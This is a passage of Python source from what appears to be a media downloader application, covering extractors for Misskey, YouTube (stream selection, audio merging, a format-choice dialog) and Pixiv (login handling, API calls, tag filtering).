self.session.cookies.get('token', domain=DOMAIN) url_api = f'https://{DOMAIN}/api/{path}' if token: payload['i'] = token r = self.session.post(url_api, json=payload) d = r.json() if isinstance(d, dict): err = d.get('error') if err: raise errors.Invalid(err['message']) return d def read(self): nid = re.find(rf'{DOMAIN}/notes/([^/]+)', self.url) if nid: self.single = True data = {'noteId':nid, } note = self.call('notes/show', data) username = note['user']['username'] self.artist = note['user']['name'] or username host = note['user']['host'] if host: username += f'@{host}' self.title = f'{clean_title(self.artist)} (misskey_@{username})' time = get_time(note) for file in note['files']: file = get_file(note['id'], file['url'], self.url, self.session, len(self.urls), time) if SUBFOLDER: file['name'] = self.title + '/' + file['name'] self.urls.append(file) else: username = re.find(rf'{DOMAIN}/@([a-zA-Z0-9_@\.]+)', self.url, err='no username') if '@' in username: username, host = username.split('@') else: host = None data = {"username":username, "host":host, } d = self.call('users/show', data) username = d['username'] self.artist = d['name'] or username host = d['host'] or None if host: username += f'@{host}' uid = d['id'] self.title = title = f'{clean_title(self.artist)} (misskey_@{username})' untilId = None nids = set() n = get_max_range(self.cw) while check_alive(self.cw): data = {"userId":uid, "limit":30, } if untilId: data["untilId"] = untilId d = self.call('users/notes', data) if not d: break for note in d: nid = note['id'] if nid in nids: continue nids.add(nid) time = get_time(note) url_note = f'https://{DOMAIN}/notes/{nid}' for p, file in enumerate(note['files']): file = get_file(note['id'], file['url'], url_note, self.session, p, time) self.urls.append(file) untilId = nid self.cw.setTitle(f'{tr_("읽는 중...")} {title} - {len(self.urls)}') if len(self.urls) >= n: break self.title = title File: src/extractor/youtube_downloader.py #coding: utf-8 import ytdl import downloader import downloader_v3 from error_printer import print_error from timee import sleep import ree as re from utils import urljoin, Downloader, try_n, get_print, filter_range, compatstr, uuid, get_max_range, format_filename, get_resolution, get_abr, Session, fix_dup, File, clean_title import ffmpeg import constants import os import utils from translator import tr, tr_ from datetime import datetime import threading from putils import DIR import errors MODE = 'query' utils.TOKENS['youtube'] = ['title', 'id', 'artist', 'date'] + utils.ADD_TOKENS def print_streams(streams, cw): print_ = get_print(cw) for stream in streams: print_(f'{"LIVE " if stream.live else ""}[{stream.resolution}][{stream.fps}fps][{stream.abr_str}{"(fixed)" if stream.abr_fixed else ""}][{stream.tbr}] {stream.subtype} [{stream.video_codec} / {stream.audio_codec}] ─ {stream.format}') print_('') class Video(File): type = 'youtube' vcodec = None filename0 = None chapters = None _yt = None _thumb = None @property def yt(self): print_ = get_print(self.cw) if self._yt is None: for try_ in range(4): try: self._yt = ytdl.YouTube(self['referer'], cw=self.cw) break except errors.Retry as e: raise e except Exception as e: e_ = e s = print_error(e) print_('### youtube retry...\n{}'.format(s)) sleep(try_, self.cw) else: raise e_ return self._yt def thumb(self): if self._thumb is None: self.thumb_url, self._thumb = ytdl.download_thumb(self.yt.thumbnail_url, self.cw, self.session) self._thumb.seek(0) return self._thumb def get(self): type = self['type'] only_mp4 = self['only_mp4'] audio_included = self['audio_included'] max_res = self['max_res'] max_abr = self['max_abr'] cw = self.cw session = self.session url = self['referer'] print_ = get_print(cw) print('max_res: {}'.format(max_res)) yt = self.yt if utils.ui_setting.chapterMarkerCheck.isChecked(): self.chapters = yt.info.get('chapters') streams = yt.streams.all() print_streams(streams, cw) #3528 time = datetime.strptime(yt.info['upload_date'], '%Y%m%d') if utils.ui_setting.youtubeMtimeCheck.isChecked(): #6092 self.utime = (time-datetime(1970,1,1)).total_seconds() print_('utime: {}'.format(self.utime)) if type == 'video': streams[:] = [stream for stream in streams if stream.video_codec is not None] # Only mp4 if only_mp4: streams_ = list(streams) streams[:] = [] for stream in streams_: if stream.subtype == 'mp4': streams.append(stream) # Audio included; Non-HD if audio_included: streams_ = list(streams) streams[:] = [] for stream in streams_: if stream.audio_codec is not None: streams.append(stream) # Maximum resolution streams_ = list(streams) streams[:] = [] for stream in streams_: if stream.resolution is None: continue res = int(stream.resolution.replace('p','')) if max_res is None or res <= max_res: streams.append(stream) def key(stream): fps = stream.fps vc = stream.video_codec if vc: vc = vc.lower().split('.')[0].lower() if vc == 'av01': vc = 'av1' if vc == 'vp09': vc = 'vp9' try: i = constants.CODECS_PRI.index(vc) except ValueError: i = 999 pr = 'premium' in stream.format.lower() #6350 return not pr, i, -fps, -stream.tbr streams = sorted(streams, key=key) #6079 print_('') elif type == 'audio': streams[:] = [stream for stream in streams if stream.abr] # Maximum abr abrs = [stream.abr for stream in streams] max_abr = min(max(abrs), max_abr) streams_ = list(streams) streams[:] = [] for stream in streams_: if stream.abr is None: continue abr = stream.abr if max_abr is None or abr >= max_abr: streams.append(stream) #''' else: raise Exception('type "{}" is not supported'.format(type)) # Pick the best while streams: if type == 'video': ress = [int_(stream.resolution.replace('p', '')) for stream in streams] m = max(ress) prefer_format = None#'mp4' elif type == 'audio': ress = [stream.abr for stream in streams] m = min(ress) prefer_format = 'webm' print('Resolutions:', ress) stream_final = None for stream, res in zip(streams, ress): if res == m: if type == 'video': foo = (stream_final is not None) and (stream_final.audio_codec is None) and bool(stream.audio_codec) and stream_final.fps <= stream.fps #6911 elif type == 'audio': foo = False if stream_final is None or (foo or (stream_final.subtype.lower()!=prefer_format and stream.subtype.lower()==prefer_format)): #print(foo) print_('# stream_final') print_streams([stream], cw) stream_final = stream ok = downloader.ok_url(stream_final.url, referer=url, session=session) if isinstance(stream_final.url, str) else True if ok: break else: print_('stream is not valid') streams.remove(stream_final) else: if type == 'audio' and max_abr > 0: self['max_abr'] = 0 return self.get(url) # 1776 raise Exception('No videos') stream = stream_final ## if stream.video_codec and stream_final.video_codec.lower().startswith('av'): ## self.vcodec = 'h264' self.id = yt.video_id self.stream = stream self.username = yt.info['uploader'] self.stream_audio = None self.audio = None self.thumb_url = None if type == 'audio' and 'DASH' in self.stream.format: self.stream.setDashType('audio') # Audio if type=='video' and stream.audio_codec is None: print('audio required') streams = [stream for stream in yt.streams.all() if stream.abr] print_streams(streams, cw) # only mp4; https://github.com/KurtBestor/Hitomi-Downloader/issues/480 def isGood(stream): return stream.audio_codec.lower().startswith('mp4') streams_good = [stream for stream in streams if isGood(stream)] if streams_good: streams = streams_good print_streams(streams, cw) # only audio? if any(stream.resolution is None for stream in streams): streams = [stream for stream in streams if stream.resolution is None] print_streams(streams, cw) def key(stream): abr = stream.abr format_note = stream.video.get('format_note') if format_note and 'original' in format_note.lower(): org = 0 else: org = 1 lang = stream.video.get('language') if lang and constants.ALANG: match_full = lang.lower().startswith(constants.ALANG) match_part = lang.lower().startswith(constants.ALANG.split('-')[0]) if match_full or match_part: lang = -1 if match_full else 0 else: lang = 1 else: lang = 1 return lang, org, -abr streams = sorted(streams, key=key) #6332 best_audio = streams[0] print_streams([best_audio], cw) self.stream_audio = best_audio if 'DASH' in self.stream_audio.format: self.stream_audio.setDashType('audio') self.audio = best_audio.url if callable(self.audio): self.audio = self.audio() # _url = self.stream.url if callable(_url): _url = _url() title = yt.title #soup = Soup(yt.watch_html) #title = soup.title.text.replace('- YouTube', '').strip() self.title = title ext = '.' + self.stream.subtype #6425 d = {} v = self.stream.video if type != 'audio': d['width'] = v['width'] d['height'] = v['height'] tokens = ['fps', 'vcodec', 'acodec', 'audio_channels', 'language', 'vbr', 'abr', 'tbr'] for token in tokens: value = v.get(token) if isinstance(value, str): value = clean_title(value) d[token] = value if self.stream_audio: v = self.stream_audio.video for token in tokens: value = v.get(token) if isinstance(value, str): value = clean_title(value) _ = d.get(token) if not _ or _ == 'none': d[token] = value filename = format_filename(title, yt.video_id, ext, artist=yt.info['uploader'], date=None if self.stream.live else time, d=d, live=self.stream.live) #4953, #5529 if cw: filename = fix_dup(filename, cw.downloader.cache_filenames) #6235 print_(f'filename: {filename}') if type == 'audio': self.filename0 = filename filename = f'{uuid()}_audio.tmp' #4776 print_('Resolution: {}'.format(stream.resolution)) print_('Codec: {} / {}'.format(stream.video_codec, stream.audio_codec)) print_('Abr: {}'.format(stream.abr)) print_('Subtype: {}'.format(stream.subtype)) print_('FPS: {}\n'.format(stream.fps)) if self.audio is not None: #5015 def f(audio): print_('Download audio: {}'.format(audio)) path = os.path.join(DIR, f'{uuid()}_a.tmp') if cw is not None: cw.trash_can.append(path) if constants.FAST: downloader_v3.download(audio, session=session, chunk=1024*1024, n_threads=2, outdir=os.path.dirname(path), fileName=os.path.basename(path), customWidget=cw, overwrite=True, mode=MODE) else: downloader.download(audio, session=session, outdir=os.path.dirname(path), fileName=os.path.basename(path), customWidget=cw, overwrite=True) self.audio_path = path print_('audio done') self.thread_audio = threading.Thread(target=f, args=(self.audio,), daemon=True) self.thread_audio.start() return {'url': _url, 'name': filename} def pp(self, filename, i=0): cw = self.cw print_ = get_print(cw) ui_setting = utils.ui_setting ext = os.path.splitext(filename)[1].lower() if not os.path.isfile(filename): print('no file: {}'.format(filename)) return filename_new = filename if self['type'] == 'video' and (self.audio is not None or ext != '.mp4') and not self.stream.live: # UHD or non-mp4 if self.audio is not None: # merge self.thread_audio.join() ext, out = ffmpeg.merge(filename, self.audio_path, cw=cw, vcodec=self.vcodec) #print(out) name, ext_old = os.path.splitext(filename) if ext_old.lower() != ext.lower(): print_('rename ext {} --> {}'.format(ext_old, ext)) filename_new = '{}{}'.format(name, ext) if os.path.isfile(filename_new): os.remove(filename_new) os.rename(filename, filename_new) else: # convert non-mp4 video -> mp4 name, ext_old = os.path.splitext(filename) filename_new = '{}.mp4'.format(name) print_('Convert video: {} -> {}'.format(filename, filename_new)) ffmpeg.convert(filename, filename_new, cw=cw) elif self['type'] == 'audio' and ext != '.mp3': # convert non-mp3 audio -> mp3 name, ext_old = os.path.splitext(filename) filename_new = '{}.mp3'.format(name) ffmpeg.convert(filename, filename_new, '-shortest -preset ultrafast -b:a {}k'.format(get_abr()), cw=cw) if self.filename0 and os.path.basename(filename_new) != self.filename0: #4776 filename0 = utils.fix_enumerate(self.filename0, i, cw) filename_old = filename_new ext = '.mp4' if self['type'] == 'video' else '.mp3' filename_new = os.path.join(os.path.dirname(filename_old), os.path.splitext(filename0)[0]+ext) print_(f'rename: {filename_old} -> {filename_new}') if filename_old != filename_new: if not os.path.exists(os.path.dirname(filename_new)): os.makedirs(os.path.dirname(filename_new)) if os.path.isfile(filename_new): os.remove(filename_new) os.rename(filename_old, filename_new) if self['type'] == 'audio' and ui_setting.albumArt.isChecked(): try: ffmpeg.add_cover(filename_new, self.thumb(), {'artist':self.yt.info['uploader'], 'title':self.title}, cw=cw) except Exception as e: s = print_error(e) print_(s) if self.chapters and self['type'] == 'video': #6085 try: chapters = [] for chapter in self.chapters: chapter = ffmpeg.Chapter(chapter['title'], chapter['start_time'], chapter['end_time']) chapters.append(chapter) ffmpeg.add_chapters(filename_new, chapters, cw=cw) except Exception as e: s = print_error(e) print_(s) return filename_new def pp_always(self, filename): cw = self.cw print_ = get_print(cw) if utils.ui_setting.thumbCheck.isChecked(): import filetype s = self.thumb().getvalue() ext = filetype.guess(s) if ext is None: raise Exception('unknown ext') filename_thumb = os.path.splitext(filename)[0] + '.' + ext.extension print_(f'filename_thumb: {filename_thumb}') with open(filename_thumb, 'wb') as f: f.write(s) cw.imgs.append(filename_thumb) cw.dones.add(os.path.abspath(filename_thumb)) if utils.ui_setting.subtitle.isChecked(): self.subs = self.yt.subtitles utils.pp_subtitle(self, filename, cw) return filename def get_id(url): id_ = re.find(r'youtu.be/([0-9A-Za-z-_]{10,})', url) or re.find(r'[?&]v=([0-9A-Za-z-_]{10,})', url) or re.find(r'/(v|embed|shorts|live)/([0-9A-Za-z-_]{10,})', url) or re.find(r'%3Fv%3D([0-9A-Za-z-_]{10,})', url) #5679 if isinstance(id_, tuple): id_ = id_[-1] return id_ class Downloader_youtube(Downloader): type = 'youtube' single = True yt_type = None URLS = ['youtube.co', 'youtu.be', 'yewtu.be'] lock = True display_name = 'YouTube' keep_date = True #3528 __format = {} ACCEPT_COOKIES = [r'.*(youtube|youtu\.be|google).*'] atts = ['cache_filenames'] def init(self): self.cache_filenames = {} format = self.cw.format if format: if isinstance(format, str): ext_result = format elif isinstance(format, dict): ext_result = format['format'] self.__format = format else: raise NotImplementedError(format) else: ext_result = default_option() self.cw.format = ext_result if ext_result in ['mp4', 'mkv', '3gp']: self.yt_type = 'video' else: self.yt_type = 'audio' self.cw.setMusic(True) self.session = Session() @classmethod def fix_url(cls, url): #2033 url = url.replace('yewtu.be', 'youtube.com') if not re.match('https?://.+', url, re.I): url = 'https://www.youtube.com/watch?v={}'.format(url) id_ = get_id(url) if id_: #6485 url = 'https://www.youtube.com/watch?v={}'.format(id_) for header in ['channel', 'user', 'c']: #5365, #5374 tab = re.find(rf'/{header}/[^/]+/?(.+)?', url, re.I) if tab == 'playlists': url = re.sub(rf'(/{header}/[^/]+/?)(.+)?', r'\1', url, flags=re.I) tab = '' if tab in ['', 'featured'] and '/{}/'.format(header) in url.lower(): username = re.find(r'/{}/([^/\?]+)'.format(header), url, re.I) url = urljoin(url, '/{}/{}/videos'.format(header, username)) m = re.find(r'youtube.com/(@[^/]+)/?(.+)?', url, re.I) if m and m[1] in ['', 'featured']: #6129 url = urljoin(url, f'/{m[0]}/videos') return url.strip('/') @classmethod def key_id(cls, url): return get_id(url) or url @classmethod def is_channel_url(cls, url): if '/channel/' in url or '/user/' in url or '/c/' in url: return True if ''.join(url.split('/')[3:4]).startswith('@'): return not url.lower().endswith('/live') return False def read(self): cw = self.cw if self.yt_type == 'video': res = self.__format.get('res', get_resolution()) info = get_videos(self.url, self.session, type=self.yt_type, max_res=res, only_mp4=False, audio_included=not True, cw=cw) else: abr = self.__format.get('abr', get_abr()) info = get_videos(self.url, self.session, type=self.yt_type, max_abr=abr, cw=cw) videos = info['videos'] if not videos: raise Exception('No videos') self.enableSegment(overwrite=True) self.cw.v3['mode'] = MODE # first video must be valid while videos: video = videos[0] try: video.ready(cw) break except Exception as e: e_ = e self.print_(print_error(e)) videos.remove(video) else: raise e_ if info['type'] != 'single': video = self.process_playlist(info['title'], videos) else: self.urls.append(video) self.title = os.path.splitext(video.filename0 or video['name'])[0].replace(':', ':') #4776 if video.stream.live: self.lock = False self.artist = video.username self.setIcon(video.thumb()) if video.stream.live: d = {} d['url'] = self.url d['title'] = self.artist d['thumb'] = video.thumb().getvalue() utils.update_live(d, self.cw) def int_(x): try: return int(x) except: return 0 @try_n(2, sleep=1) def get_videos(url, session, type='video', only_mp4=False, audio_included=False, max_res=None, max_abr=None, cw=None): info = {} n = get_max_range(cw) if Downloader.get('youtube').is_channel_url(url): #5445 reverse = utils.SD['youtube']['channel_reverse'] #5848 tab = ''.join(url.split('/')[4:5]) if tab == '': #5901 url = '/'.join(url.split('/')[:4]) + '/videos' info = read_channel(url, n=n, cw=cw, reverse=reverse) info['type'] = 'channel' info['title'] = '[Channel] {}'.format(info['uploader']) if cw: info['urls'] = filter_range(info['urls'], cw.range) cw.fped = True elif '/playlist' in url: info = read_playlist(url, n=n, cw=cw) info['type'] = 'playlist' info['title'] = '[Playlist] {}'.format(info['title']) if cw: info['urls'] = filter_range(info['urls'], cw.range) cw.fped = True elif get_id(url) or url.lower().endswith('/live'): info['type'] = 'single' info['urls'] = [url] else: raise NotImplementedError(url) info['videos'] = [Video({'referer':url, 'type':type, 'only_mp4':only_mp4, 'audio_included':audio_included, 'max_res':max_res, 'max_abr':max_abr}) for url in info['urls']] return info def read_channel(url, n, cw=None, reverse=False): return read_playlist(url, n, cw, reverse=reverse) @try_n(2) def read_playlist(url, n, cw=None, reverse=False): print_ = get_print(cw) options = { 'extract_flat': True, 'playlistend': n, 'writesubtitles': True, } ydl = ytdl.YoutubeDL(options, cw=cw) info = ydl.extract_info(url) es = info['entries'] urls = [] for e in es: href = 'https://www.youtube.com/watch?v={}'.format(e['id']) urls.append(href) if reverse: urls = urls[::-1] info['urls'] = urls if not info.get('uploader'): title = info['title'] if title.lower().endswith(' - videos'): title = title[:-len(' - videos')] info['uploader'] = title print_('⚠️ Fix uploader: None -> {}'.format(title)) return info import selector @selector.register('youtube') def select(): from Qt import Qt, QDialog, QFormLayout, QLabel, QComboBox, QWidget, QVBoxLayout, QDialogButtonBox if utils.ui_setting.askYoutube.isChecked(): win = QDialog(constants.mainWindow) win.setWindowTitle('Youtube format') utils.windows.append(win) layout = QFormLayout(win) youtubeCombo_type = QComboBox() layout.addRow('파일 형식', youtubeCombo_type) for i in range(utils.ui_setting.youtubeCombo_type.count()): youtubeCombo_type.addItem(utils.ui_setting.youtubeCombo_type.itemText(i)) youtubeCombo_type.setItemIcon(i, utils.ui_setting.youtubeCombo_type.itemIcon(i)) youtubeCombo_type.setCurrentIndex(utils.ui_setting.youtubeCombo_type.currentIndex()) youtubeLabel_res = QLabel('해상도') youtubeCombo_res = QComboBox() for i in range(utils.ui_setting.youtubeCombo_res.count()): youtubeCombo_res.addItem(utils.ui_setting.youtubeCombo_res.itemText(i)) youtubeCombo_res.setCurrentIndex(utils.ui_setting.youtubeCombo_res.currentIndex()) youtubeLabel_abr = QLabel('음질') youtubeCombo_abr = QComboBox() for i in range(utils.ui_setting.youtubeCombo_abr.count()): youtubeCombo_abr.addItem(utils.ui_setting.youtubeCombo_abr.itemText(i)) youtubeCombo_abr.setCurrentIndex(utils.ui_setting.youtubeCombo_abr.currentIndex()) aa = QWidget() a = QVBoxLayout(aa) a.setContentsMargins(0,0,0,0) a.addWidget(youtubeLabel_res) a.addWidget(youtubeLabel_abr) bb = QWidget() b = QVBoxLayout(bb) b.setContentsMargins(0,0,0,0) b.addWidget(youtubeCombo_res) b.addWidget(youtubeCombo_abr) layout.addRow(aa, bb) def currentIndexChanged(index): text_type = compatstr(youtubeCombo_type.currentText()) print(text_type) if tr_('동영상') in text_type: youtubeLabel_abr.hide() youtubeCombo_abr.hide() youtubeLabel_res.show() youtubeCombo_res.show() elif tr_('음원') in text_type: youtubeLabel_res.hide() youtubeCombo_res.hide() youtubeLabel_abr.show() youtubeCombo_abr.show() youtubeCombo_type.currentIndexChanged.connect(currentIndexChanged) youtubeCombo_type.currentIndexChanged.emit(youtubeCombo_type.currentIndex()) buttonBox = QDialogButtonBox() layout.addWidget(buttonBox) buttonBox.setOrientation(Qt.Horizontal) buttonBox.setStandardButtons(QDialogButtonBox.Cancel | QDialogButtonBox.Ok) buttonBox.accepted.connect(win.accept) buttonBox.rejected.connect(win.reject) tr(win) win.setWindowOpacity(constants.opacity_max) try: res = win.exec() if not res: return selector.Cancel utils.windows.remove(win) format = {} format['format'] = compatstr(youtubeCombo_type.currentText()).lower().split()[0] format['res'] = get_resolution(compatstr(youtubeCombo_res.currentText())) format['abr'] = get_abr(compatstr(youtubeCombo_abr.currentText())) finally: win.deleteLater() return format @selector.options('youtube') def options(urls): return [ {'text': 'MP4 (동영상)', 'format': 'mp4', 'icon': 'movie'}, {'text': 'MP3 (음원)', 'format': 'mp3', 'icon': 'music'}, ] @selector.default_option('youtube') def default_option(): return compatstr(utils.ui_setting.youtubeCombo_type.currentText()).lower().split()[0] def get_streamer_name(url): if url.endswith('/live'): url = url[:-len('/live')] ydl = ytdl.YoutubeDL({'playlistend': 0}, type='youtube') info = ydl.extract_info(url) return info['channel'] class Live_youtube(utils.Live): type = 'youtube' @classmethod def is_live(cls, url): return ''.join(url.split('/')[3:4]).startswith('@') @classmethod def fix_url(cls, url): cn = url.split('/')[3].split('?')[0].split('#')[0] return f'https://youtube.com/{cn}/live' @classmethod def check_live(cls, url, info=None): if info is not None: try: info['title'] = get_streamer_name(url) except Exception as e: utils.log(print_error(e)) ydl = ytdl.YoutubeDL(type='youtube') try: _ = ydl.extract_info(url) return _.get('live_status') == 'is_live' except Exception as e: print(e) return False File: src/extractor/pixiv_downloader.py import downloader from utils import Downloader, urljoin, clean_title, LazyUrl, get_ext, get_print, try_n, compatstr, get_max_range, check_alive, query_url, Soup, limits import ffmpeg import utils import os import ree as re import errors from translator import tr_ from error_printer import print_error from urllib.parse import quote, unquote import constants from datetime import datetime import requests from timee import sleep from collections import deque from locker import lock import threading import clf2 from PIL import Image as Image_ ##import asyncio LIMIT = 48 for header in ['pixiv_illust', 'pixiv_bmk', 'pixiv_search', 'pixiv_following', 'pixiv_following_r18']: if header not in constants.available_extra: constants.available_extra.append(header) utils.TOKENS['pixiv'] = ['id', 'page', 'artist', 'artistid', 'title', 'date'] class LoginRequired(errors.LoginRequired): def __init__(self, *args): super().__init__(*args, method='browser', url='https://accounts.pixiv.net/login', w=560, h=920) class Downloader_pixiv(Downloader): type = 'pixiv' MAX_CORE = 4 MAX_PARALLEL = 2 keep_date = True STEP = 4, 16 URLS = ['pixiv.me', 'pixiv.net'] ACCEPT_COOKIES = [r'(.*\.)?pixiv\.(com|co|net|me)'] def init(self): setattr(self.cw, 'sid?', None) res = clf2.solve(self.url, cw=self.cw) self.session = res['session'] #5105 soup = Soup(res['html']) if soup.find('a', href=lambda h: h and '/login.php' in h): def f(html, browser=None): soup = Soup(html) for div in soup.findAll('div'): if div.get('data-page-name') == 'LoginPage': browser.show() return False browser.hide() return True try: res = clf2.solve('https://accounts.pixiv.net/login', session=self.session, cw=self.cw, f=f, delay=3, w=560, h=920, timeout=120) except clf2.Timeout: raise LoginRequired() res = clf2.solve(self.url, session=self.session, cw=self.cw) soup = Soup(res['html']) err = soup.find('p', class_='error-message') if err: #5223 raise errors.Invalid(f'{err.text.strip()}: {self.url}') @classmethod def fix_url(cls, url): rt = utils.query_url(url).get('return_to') if rt: url = urljoin(url, rt[0]) if '/search_user.php?' in url: url = f'https://pixiv.me/{utils.query_url(url).get("nick")[0]}' if url.startswith('illust_'): url = f'https://www.pixiv.net/en/artworks/{url[len("illust_"):]}' elif url.startswith('bmk_'): url = f'https://www.pixiv.net/en/users/{url[len("bmk_"):]}/bookmarks/artworks' elif url.startswith('search_'): _ = quote(url[len('search_'):].replace('+', ' ')) url = f'https://www.pixiv.net/en/tags/{_}/artworks' elif url.startswith('following_r18_'): url = 'https://www.pixiv.net/bookmark_new_illust_r18.php' elif url.startswith('following_'): url = 'https://www.pixiv.net/bookmark_new_illust.php' elif not re.find(r'^https?://', url) and '.' not in url: url = f'https://www.pixiv.net/en/users/{url}' #3474 url = re.sub(r'(users/[0-9]+)/artworks$', r'\1', url) url = re.sub(r'[?&]p=[0-9]+$', '', url) if '://' not in url: #6082 url = 'https://' + url return url.strip('/') @classmethod def key_id(cls, url): return url.replace('://www.', '://').replace('/en/', '/').replace('http://', 'https://').lower() def read(self): ## loop = asyncio.new_event_loop() ## asyncio.set_event_loop(loop) try: info = get_info(self.url, self.session, self.cw) self.artist = info.get('artist') #4897 for img in info['imgs']: if isinstance(img, str): # local self.urls.append(img) continue self.urls.append(img.url) self.title = clean_title(info['title']) finally: ## loop.close() pass class PixivAPIError(LoginRequired): pass class HTTPError(Exception): pass class PixivAPI: def __init__(self, session, cw): self.session = session hdr = { 'Accept': 'application/json', 'Accept-Encoding': 'gzip, deflate', #6588 'Accept-Language': 'en-US,en;q=0.9,ko-KR;q=0.8,ko;q=0.7,ja;q=0.6', 'Cache-Control': 'no-cache', 'Pragma': 'no-cache', 'Referer': 'https://www.pixiv.net/', 'X-User-Id': my_id(session, cw), } self.session.headers.update(hdr) def illust_id(self, url): return re.find('/artworks/([0-9]+)', url) or re.find('[?&]illust_id=([0-9]+)', url) def user_id(self, url): return re.find('/users/([0-9]+)', url) or re.find('[?&]id=([0-9]+)', url) @try_n(8, sleep=5) @limits(1.5) #3355, #5105 def call(self, url): #print('call:', url) url = urljoin('https://www.pixiv.net/ajax/', url) e_ = None try: info = downloader.read_json(url, session=self.session) except requests.exceptions.HTTPError as e: code = e.response.status_code if code in (403, 404): e_ = HTTPError(f'{code} Client Error') else: raise e if e_: raise e_ err = info['error'] if err: raise PixivAPIError(info.get('message')) return info['body'] def illust(self, id_): return self.call(f'illust/{id_}') def pages(self, id_): return self.call(f'illust/{id_}/pages') def ugoira_meta(self, id_): return self.call(f'illust/{id_}/ugoira_meta') def profile(self, id_): return self.call(f'user/{id_}/profile/all') def top(self, id_): return self.call(f'user/{id_}/profile/top') def bookmarks(self, id_, offset=0, limit=None, rest='show'): if limit is None: limit = LIMIT return self.call(f'user/{id_}/illusts/bookmarks?tag=&offset={offset}&limit={limit}&rest={rest}') def search(self, q, order='date_d', mode='all', p=1, s_mode='s_tag_full', type_='all', scd=None, ecd=None, wlt=None, wgt=None, hlt=None, hgt=None, blt=None, bgt=None, ratio=None, tool=None): url = f'search/artworks/{quote(q)}?word={quote(q)}&order={order}&mode={mode}&p={p}&s_mode={s_mode}&type={type_}' if scd: url += f'&scd={scd}' if ecd: url += f'&ecd={ecd}' if wlt: url += f'&wlt={wlt}' if wgt: url += f'&wgt={wgt}' if hlt: url += f'&hlt={hlt}' if hgt: url += f'&hgt={hgt}' if blt: url += f'&blt={blt}' if bgt: url += f'&bgt={bgt}' if ratio: url += f'&ratio={ratio}' if tool: url += f'&tool={tool}' return self.call(url) def following(self, p, r18=False): #4077 mode = 'r18' if r18 else 'all' url = f'follow_latest/illust?p={p}&mode={mode}' return self.call(url) class Image: local = False def __init__(self, url, referer, id_, p, info, cw, ugoira=None): self._url = url self.id_ = id_ self.p = p self.artist = info['artist'] self.artistid = info['artist_id'] #3636 self.title = info['raw_title'] self.utime = info['create_date'] self.cw = cw self.ugoira = ugoira self.url = LazyUrl(referer, self.get, self, pp=self.pp, detect_local=not ugoira) def get(self, referer): d = { 'id': self.id_, 'page': self.p, 'artist': clean_title(self.artist, allow_dot=True), 'artistid': self.artistid, 'title': clean_title(self.title, allow_dot=True), #6433, #6592 'date': self.utime, } self.filename = utils.format('pixiv', d, get_ext(self._url)) if self.ugoira and self.ugoira['ext']: #3355 filename_local = os.path.join(self.cw.dir, self.filename) filename_local = f'{os.path.splitext(filename_local)[0]}{self.ugoira["ext"]}' if os.path.abspath(filename_local) in self.cw.names_old or os.path.exists(filename_local): #4534 self.filename = os.path.basename(filename_local) self.local = True return self._url def pp(self, filename): if self.ugoira and self.ugoira['ext'] and not self.local: if utils.ui_setting: dither = utils.ui_setting.checkDither.isChecked() quality = utils.ui_setting.ugoira_quality.value() else: dither = True quality = 90 filename_new = f'{os.path.splitext(filename)[0]}{self.ugoira["ext"]}' ffmpeg.gif(filename, filename_new, self.ugoira['delay'], dither=dither, quality=quality, cw=self.cw) utils.removeDirList.append((filename, False)) return filename_new def pretty_tag(tag): return tag.replace(' ', '').lower() @lock def tags_matched(tags_illust, tags_add, cw=None): print_ = get_print(cw) cache = cw.get_extra('pixiv_tag_cache') if cw else None init = True if cache is not None: init = False tags = set(cache['tags']) tags_ex = set(cache['tags_ex']) else: if utils.ui_setting and utils.ui_setting.groupBox_tag.isChecked(): tags_ = [compatstr(utils.ui_setting.tagList.item(i).text()) for i in range(utils.ui_setting.tagList.count())] else: tags_ = [] tags = set() tags_ex = set() for tag in tags_: tag = pretty_tag(tag) if tag.startswith('-'): tags_ex.add(tag[1:].strip()) else: tags.add(tag) if init: if cw: cache = {} cache['tags'] = list(tags) cache['tags_ex'] = list(tags_ex) cw.set_extra('pixiv_tag_cache', cache) print_(f'tags: [{", ".join(tags)}]') print_(f'tags_ex: [{", ".join(tags_ex)}]') if tags_add: tags.update((pretty_tag(tag) for tag in tags_add)) if init: print_(f'tags_add: {tags_add}') tags_illust = set(pretty_tag(tag) for tag in tags_illust) return (not tags or tags & tags_illust) and tags_ex.isdisjoint(tags_illust) def get_info(url, session, cw=None, depth=0, tags_add=None): print_ = get_print(cw) api = PixivAPI(session, cw) info = {} imgs = [] ugoira_ext = [None, '.gif', '.webp', '.png'][utils.ui_setting.ugoira_convert.currentIndex()] if utils.ui_setting else None max_pid = get_max_range(cw) if api.illust_id(url): # Single post id_ = api.illust_id(url) data = api.illust(id_) login = 'noLoginData' not in data if not login:# raise LoginRequired() if data['xRestrict'] and not login: raise LoginRequired('R-18') info['artist'] = data['userName'] info['artist_id'] = data['userId'] info['raw_title'] = data['illustTitle'] info['title'] = f'{info["raw_title"]} (pixiv_illust_{id_})' info['create_date'] = parse_time(data['createDate']) tags_illust = set(tag['tag'] for tag in data['tags']['tags']) if tags_matched(tags_illust, tags_add, cw): if data['illustType'] == 2: # ugoira data = api.ugoira_meta(id_) ugoira = { 'ext': ugoira_ext, 'delay': [frame['delay'] for frame in data['frames']], } img = Image(data['originalSrc'], url, id_, 0, info, cw, ugoira=ugoira) imgs.append(img) else: data = api.pages(id_) for img in data: img = Image(img['urls']['original'], url, id_, len(imgs), info, cw) imgs.append(img) else: print('tags mismatched') elif '/bookmarks/' in url or 'bookmark.php' in url: # User bookmarks id_ = api.user_id(url) if id_ is None: # id_ = my_id(session, cw) if id_ == my_id(session, cw): rests = ['show', 'hide'] else: rests = ['show'] process_user(id_, info, api) info['title'] = f'{info["artist"]} (pixiv_bmk_{info["artist_id"]})' ids = [] ids_set = set() for rest in rests: offset = 0 while len(ids) < max_pid: data = api.bookmarks(id_, offset, rest=rest) c = 0 for id in [work['id'] for work in data['works']]: if id in ids_set: continue ids_set.add(id) ids.append(id) c += 1 if not c: break offset += LIMIT if depth == 0: check_alive(cw) process_ids(ids, info, imgs, session, cw, depth) elif '/tags/' in url or 'search.php' in url: # Search q = unquote(re.find(r'/tags/([^/]+)', url) or re.find('[?&]word=([^&]*)', url, err='no tags')) info['title'] = f'{q} (pixiv_search_{q.replace(" ", "+")})' qs = query_url(url) order = qs.get('order', ['date_d'])[0] mode = qs.get('mode', ['all'])[0] s_mode = qs.get('s_mode', ['s_tag_full'])[0] scd = qs.get('scd', [None])[0] ecd = qs.get('ecd', [None])[0] type_ = qs.get('type', ['all'])[0] wlt = qs.get('wlt', [None])[0] wgt = qs.get('wgt', [None])[0] hlt = qs.get('hlt', [None])[0] hgt = qs.get('hgt', [None])[0] blt = qs.get('blt', [None])[0] bgt = 